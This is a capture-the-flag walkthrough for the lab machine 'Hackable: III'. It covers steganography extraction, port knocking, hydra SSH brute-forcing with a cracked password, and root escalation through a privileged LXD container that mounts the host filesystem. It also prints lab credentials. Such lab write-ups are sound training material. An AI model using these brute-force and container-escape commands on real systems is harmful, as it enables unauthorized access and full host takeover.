Hackable-III

By Lawcky 09/01/24

Introduction

Focus on general concepts about CTF

Difficulty : Medium

Additionnal info :

Name: Hackable: III
Release date: 2 Jun 2021
Author: Elias Sousa
Series: Hackable

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

---

In this write-up

• steghide
• knockd
• hydra
• lxd

---

Write-UP

the website :

Enumerating

<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->

also found

and login_page/login.html

when trying the login it opens a white page with this inside the source code

when going to the image link we find an image

Steganography

steghide --extract -sf JESUS.jpg

Port Knocking

we now know that the port 65535 is one of the port that we shall use for the port knocking mentionned above

in the webpages we find 2 others ports,
one in the /config/1.txt and the other in a css page 2.txt

echo MTAwMDA= | base64 -d
= 10000

=4444

in order :

knock 192.168.1.42 10000 4444 65535

then nmap 192.168.1.42 -p22

Bruteforce SSH

lets use the user we know and the wordlist we already had

hydra -l jubiscleudo -P wordlist.txt -t 64 ssh://192.168.1.42 -I

jubiscleudo:onlymy

first flag found

---

Privilege Escalation

found this in root

found this hidden file in /var/www/html/

those credentials are the actual hackable_3’s user

hackable_3:TrOLLED_3

we see that the user belong to the lxd group

we can use this to escalade privileges

it had never been launched so first

lxd init dir

then

lxc init ubuntu:16.04 test -c security.privileged=true

lxc config device add test whatever disk source=/ path=/mnt/root recursive=true

lxc start test

lxc exec test bash

cd /mnt/root

done

second flag found